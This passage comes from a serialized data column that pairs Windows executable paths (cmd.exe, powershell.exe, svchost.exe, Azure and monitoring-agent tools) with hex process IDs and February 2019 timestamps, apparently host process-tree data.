09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xfc82019-02-10 12:45:34.933000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xadc2019-02-10 12:45:35.943000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xeb02019-02-10 12:45:36.280000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x107c2019-02-10 12:48:15.140000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\usoclient.exe0xc5c2019-02-10 13:55:20.800000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xd442019-02-10 15:48:03.363000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"NaN\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"NaN\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0x8641970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x8dc2019-02-09 21:02:56.257000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0x8641970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0xd742019-02-09 23:22:56.257000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0x8641970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x6f82019-02-09 23:32:56.260000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0x8641970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x1fc02019-02-10 00:02:56.257000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0x8641970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x10bc2019-02-10 00:12:56.253000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0x8641970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0xb482019-02-10 00:32:56.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0x8641970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0xbd02019-02-09 21:32:56.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0x8641970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x15c82019-02-09 20:32:56.260000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0x8641970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0xe342019-02-09 22:02:56.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0x8641970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x53c2019-02-09 22:32:56.247000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0x8641970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0xef42019-02-09 22:32:56.260000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0x8641970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0xcd82019-02-09 20:52:56.260000\",\"NaN\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x181c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xbc2019-02-09 21:09:24.310000\",\"NaN\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1d6c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1d6c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1d6c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1d6c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1d6c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1d6c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1d6c1970-01-01 00:00:00.000000\",\"NaN\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x123c2019-02-09 23:16:28.153000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x123c2019-02-09 23:16:28.153000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xccc2019-02-09 23:20:15.547000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe0xda82019-02-09 23:55:46.057000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x7fc2019-02-10 00:22:33.813000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x7fc2019-02-10 00:22:33.813000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x7982019-02-10 00:26:22.213000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x172c2019-02-10 01:27:25.173000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x172c2019-02-10 01:27:25.173000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe2c2019-02-10 01:31:14.010000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0xb142019-02-10 02:31:30.377000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0xb142019-02-10 02:31:30.377000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x18982019-02-10 02:35:21.217000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0xe1c2019-02-10 03:35:37.273000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0xe1c2019-02-10 03:35:37.273000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17c42019-02-10 03:39:26.323000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x2e42019-02-10 04:39:41.880000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x2e42019-02-10 04:39:41.880000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13602019-02-10 04:43:32.697000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x19f02019-02-10 05:43:48.783000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x19f02019-02-10 05:43:48.783000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17a82019-02-10 05:47:40.657000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe0x82c2019-02-10 05:55:52.110000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x1bfc2019-02-10 06:47:56.813000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x1bfc2019-02-10 06:47:56.813000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c102019-02-10 06:51:50.063000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0xc6c2019-02-10 07:52:06.713000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0xc6c2019-02-10 07:52:06.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x65c2019-02-10 07:56:00.233000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x10702019-02-10 08:56:16.593000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x10702019-02-10 08:56:16.593000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xb102019-02-10 09:00:10.517000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x1c542019-02-09 22:11:59.877000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x1c542019-02-09 22:11:59.877000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x8c02019-02-09 22:16:24.523000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x123c2019-02-10 10:00:27.043000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x123c2019-02-10 10:00:27.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xc982019-02-10 10:04:18.733000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x14842019-02-10 